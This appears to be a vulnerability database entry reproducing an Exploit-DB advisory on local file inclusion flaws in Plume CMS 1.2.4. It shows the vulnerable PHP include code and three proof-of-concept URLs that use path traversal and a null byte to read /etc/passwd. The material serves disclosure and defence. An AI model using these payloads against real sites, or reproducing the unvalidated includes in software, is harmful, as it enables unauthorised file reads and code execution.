Plume CMS 1.2.4 Multiple Local File Inclusion Vulnerabilities

vendor:

Plume CMS

by:

eidelweiss

8,8

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Plume CMS

Affected Version From: 1.2.4

Affected Version To: 1.2.4

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Plume CMS 1.2.4 Multiple Local File Inclusion Vulnerabilities

Plume CMS is a fully functional Content Management System in PHP on top of MySQL. It is vulnerable to Local File Inclusion (LFI) due to the lack of proper input validation in the 'plume/manager/articles.php', 'plume/manager/tools.php' and 'plume/manager/news.php' files. An attacker can exploit this vulnerability to include malicious files from the local system and execute arbitrary code.

Mitigation:

Input validation should be implemented to prevent attackers from including malicious files from the local system.

Source

Exploit-DB raw data:

########################################################
Plume CMS 1.2.4 Multiple Local File Inclusion Vulnerabilities
########################################################

[+]Title:	Plume CMS 1.2.4 Multiple Local File Inclusion Vulnerabilities
[+]Version:	1.2.4 (other or lower version may be also affected)
[+]Download:	http://sourceforge.net/projects/pxsystem/files/
[+]Author:	eidelweiss
[+]Contact:	eidelweiss[at]cyberservices[dot]com		

	[!]Thank`s To: All Friends & All Hackers

########################################################
Description:
Plume CMS is a fully functional Content Management System in PHP on top of MySQL. 
Including articles, news, file management and all of the general functionalities of a CMS. 
It is completely accessible and very easy to use on a daily basis. 
########################################################

	-=[ Vuln C0de ]=-

[-] plume/manager/articles.php
**********************
require_once 'path.php';
require_once $_PX_config['manager_path'].'/prepend.php';
require_once $_PX_config['manager_path'].'/inc/class.article.php';	// <= line 26

**********************
[-] plume/manager/tools.php
**********************
# On fait la liste des plugins
$plugins_root = dirname(__FILE__).'/tools/';

$objPlugins = new plugins($plugins_root);
$plugins_list = $objPlugins->getPlugins();

$include = '';

if (!empty($_REQUEST['p']) && !empty($plugins_list[$_REQUEST['p']])
    && $plugins_list[$_REQUEST['p']]['active']) {
	$px_submenu->addItem(__('Back to the tools'), 'tools.php',
                         'themes/'.$_px_theme.'/images/ico_back.png',
                         false);
	$p = $_REQUEST['p'];
	$_px_ptheme = $m->user->getPluginTheme($p);
	ob_start();
	include $plugins_root.$p.'/index.php'; 	// <= line 54
	$include = ob_get_contents();
**********************
[-] plume/manager/news.php

require_once 'path.php';
require_once $_PX_config['manager_path'].'/prepend.php';
require_once $_PX_config['manager_path'].'/inc/class.news.php';

**********************


	-=[ Proof Of Concept ]=-

	http://127.0.0.1/plume/manager/articles.php?_PX_config[manager_path]=../../../../../../etc/passwd%00

	http://127.0.0.1/plume/manager/tools.php?p=../../../../../../etc/passwd%00

	http://127.0.0.1/plume/manager/plume/manager/news.php?_PX_config[manager_path]=../../../../../../etc/passwd%00

	etc , etc , etc.

####################=[E0F]=####################